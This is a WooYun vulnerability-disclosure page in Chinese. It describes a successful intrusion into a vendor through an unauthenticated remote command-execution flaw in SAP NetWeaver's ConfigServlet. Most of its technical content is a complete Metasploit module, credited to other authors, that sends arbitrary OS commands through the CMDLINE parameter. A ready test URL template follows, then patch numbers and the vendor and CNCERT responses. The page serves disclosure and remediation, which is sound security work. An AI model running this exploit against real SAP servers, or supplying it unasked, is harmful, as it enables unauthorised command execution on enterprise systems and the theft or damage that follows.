当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022140

漏洞标题:用一个案例说明 SAP NETWEAVER 远程命令执行漏洞的利用与影响

相关厂商:hmel

漏洞作者: cnbird

提交时间:2013-04-19 15:15

修复时间:2013-04-23 18:42

公开时间:2013-04-23 18:42

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-19: 细节已通知厂商并且等待厂商处理中
2013-04-23: 厂商已经确认,细节仅向厂商公开
2013-04-23: 厂商提前公开漏洞,细节向公众公开

简要描述:

SAP NetWeaver 是基于专业标准的集成化应用平台,能够大幅度降低系统整合的复杂性。其组件包括门户、应用服务器、商务智能解决方案以及系统整合和数据整合技术。
本次用一个案例说明 SAP NETWEAVER 远程命令执行漏洞的利用与影响。

详细说明:

SAP NetWeaver 是基于专业标准的集成化应用平台,能够大幅度降低系统整合的复杂性。其组件包括门户、应用服务器、商务智能解决方案以及系统整合和数据整合技术。
EXP from:
http://packetstormsecurity.com/files/121355/sapconfigservlet-exec.rb.txt

require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner

def initialize(info = {})
super(update_info(info,
'Name' => 'SAP ConfigServlet OS command execution',
'Description' => %q{
This module allows execution of operating system commands through
the SAP ConfigServlet without any authentication.
},
'Author' =>
[
'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
'Andras Kabai', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf'],
],
'DisclosureDate' => 'Nov 01 2012' # Based on the reference presentation
))

register_options(
[
Opt::RPORT(50000),
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']),
OptBool.new('SSL', [true, 'Use SSL', false])
], self.class)
end

def run_host(ip)
begin
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(datastore['CMD']),
'method' => 'GET',
})
if !res or res.code != 200
print_error("#{rhost}:#{rport} - Exploit failed.")
return
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect to the server")
return
end

if res.body.include?("Process created")
print_good("#{rhost}:#{rport} - Exploited successfully\n")
print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
print_line("#{rhost}:#{rport} - Output: #{res.body}")
else
print_error("#{rhost}:#{rport} - Exploit failed.")
vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
end
end
end


测试方法:/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=[command]

漏洞证明:

hmel.jpg

修复方案:

联系SAP专业厂家,已经发了补丁了
打如下两个补丁即可
SAP 1467771,
SAP 1445998

版权声明:转载请注明来源 cnbird@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-04-23 18:25

厂商回复:

对于SAP新近披露的远程代码执行漏洞,CNVD仍然在对相关案例进行测试中。先行确认所述情况,互联网上已经披露,案例已经打码,可以提前公开。
按通用软件漏洞进行评分,rank 10

最新状态:

2013-04-23:案例打码,可以提前公开,让大家学习。